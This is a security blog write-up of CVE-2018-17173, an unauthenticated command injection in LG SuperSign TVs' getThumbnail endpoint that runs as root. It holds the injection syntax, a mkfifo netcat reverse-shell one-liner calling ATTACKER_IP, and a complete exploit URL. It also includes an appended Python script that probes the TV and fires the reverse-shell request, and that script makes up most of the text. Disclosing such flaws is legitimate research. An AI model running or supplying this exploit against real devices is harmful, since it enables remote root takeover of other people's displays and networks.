Publishing the previous vulnerabilities in LG SuperSign TVs left a bad taste in my mouth, something like "I know there must be something more". So I continued with my research and finally found the precious RCE.
This vulnerability has been assigned CVE-2018-17173.
The vuln
Playing with the app through Burp I saw a URL with several parameters. This URL is requested when the application needs to load the thumbnails of the images the user has uploaded.
So I started fuzzing these parameters with ZAP until I found something interesting:
The application responded with the help screen of a utility called luna-send when the parameter sourceUri received the value "' or 1 --'". It looked like the parameter was being passed into a command that called this utility, which then failed because of an unexpected argument. Trimming the input a bit, I found that the value ' - was enough to get this response: the single quote closes the quoted argument and the dash is read by luna-send as an unknown option. I knew I was close.
If you see something like that in a response you immediately start playing with things like ;command, ;command;, etc. After some failed attempts I tried ' -;reboot;' and watched the TV reboot... the RCE was knocking on my door.
Getting a Shell
Taking advantage of the LFI from the earlier post, I had already pulled the netcat binary off the TV and knew it was a build without the -e option, so I used the mkfifo alternative:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
URL-encoded so it can be passed in the query string:
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_IP%20PORT%20%3E%2Ftmp%2Ff
So the payload was ready (the ' - prefix closes the quoted argument, the semicolons chain our command, and the trailing ' reopens the quote so the rest of the original command line still parses):
' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE_PORT%20%3E%2Ftmp%2Ff;'
Putting it all together:
http://LG_SuperSign_IP:9080/qsr_server/device/getThumbnail?sourceUri=%27%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE_PORT%20%3E%2Ftmp%2Ff;%27&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150
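As an added example (this is not code from the original post), here is a small Python script that reproduces the steps above end to end: it builds the mkfifo reverse shell, percent-encodes it the same way as the payload above, wraps it in the ' -; ... ;' injection, assembles the getThumbnail request, and optionally sends it. The parameter names other than sourceUri are copied from the captured request; treating `_` as a cache-buster, the probe-before-exploit check for the luna-send banner, and the function names are my assumptions.

```python
# Added example, not the original post's code. Builds (and optionally fires)
# the getThumbnail command-injection request described above.
# Assumptions (not from the post): "_" is a cache-buster, the luna-send usage
# banner is a reliable injection indicator, and the function names are mine.
import socket
import sys
import time
from urllib.error import URLError
from urllib.parse import quote
from urllib.request import urlopen

THUMB_PATH = "/qsr_server/device/getThumbnail"


def reverse_shell_cmd(attacker_ip, attacker_port):
    """mkfifo reverse shell for a netcat build that lacks -e (the TV's)."""
    return (
        "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|"
        f"nc {attacker_ip} {attacker_port} >/tmp/f"
    )


def inject(cmd):
    """Wrap a shell command the way the post does: close the quoted argument
    with ' -, chain our command with ';', then reopen the quote.  The inner
    command is percent-encoded with no safe characters so that '/', ';', '|',
    '>' and '&' survive the query-string parser and reach the shell intact."""
    return "%27%20-;" + quote(cmd, safe="") + ";%27"


def build_url(tv_ip, source_uri, port=9080, ts=None):
    """Assemble the thumbnail request; source_uri is already encoded."""
    ts = ts if ts is not None else int(time.time() * 1000)
    params = [
        ("sourceUri", source_uri),
        ("targetUri", "%2Ftmp%2Fthumb%2Ftest.jpg"),
        ("mediaType", "image"),
        ("targetWidth", "400"),
        ("targetHeight", "400"),
        ("scaleType", "crop"),
        ("_", str(ts)),  # assumed cache-buster, mirrors the captured request
    ]
    query = "&".join(f"{k}={v}" for k, v in params)
    return f"http://{tv_ip}:{port}{THUMB_PATH}?{query}"


def probe_url(tv_ip, ts=None):
    """Low-impact check: the bare ' - that made luna-send print its usage."""
    return build_url(tv_ip, "%27%20-", ts=ts)


def looks_injectable(body):
    """Assumption drawn from the post's observation: a luna-send usage banner
    in the thumbnail response means our input reached a shell command line."""
    return b"luna-send" in body


def exploit_url(tv_ip, attacker_ip, attacker_port, ts=None):
    return build_url(tv_ip, inject(reverse_shell_cmd(attacker_ip, attacker_port)), ts=ts)


def fire(url, timeout=5):
    """Send the request.  The reverse-shell request never returns a body
    (the shell keeps the handler busy), so a timeout is expected, not an error."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (socket.timeout, TimeoutError):
        return b""
    except URLError as err:
        if isinstance(err.reason, (socket.timeout, TimeoutError)):
            return b""
        raise


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: lg_supersign_rce.py <tv_ip> <attacker_ip> <attacker_port>")
    tv, aip, aport = sys.argv[1:]
    if not looks_injectable(fire(probe_url(tv))):
        sys.exit("no luna-send banner in the probe response; target may be patched")
    print(f"start the listener first: nc -lvnp {aport}")
    fire(exploit_url(tv, aip, aport))
```

Start `nc -lvnp PORT` on the attacker machine before running the script; the exploit request itself will hang until the listener closes the shell, which is why `fire` treats a read timeout as success.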
I launched netcat to catch the shell, made the request and...
I was in.
In a few days I'll be updating this post with more technical details.
That is all for now.
Points to take into account:
-No authentication required
-No privilege escalation needed (the app runs as root)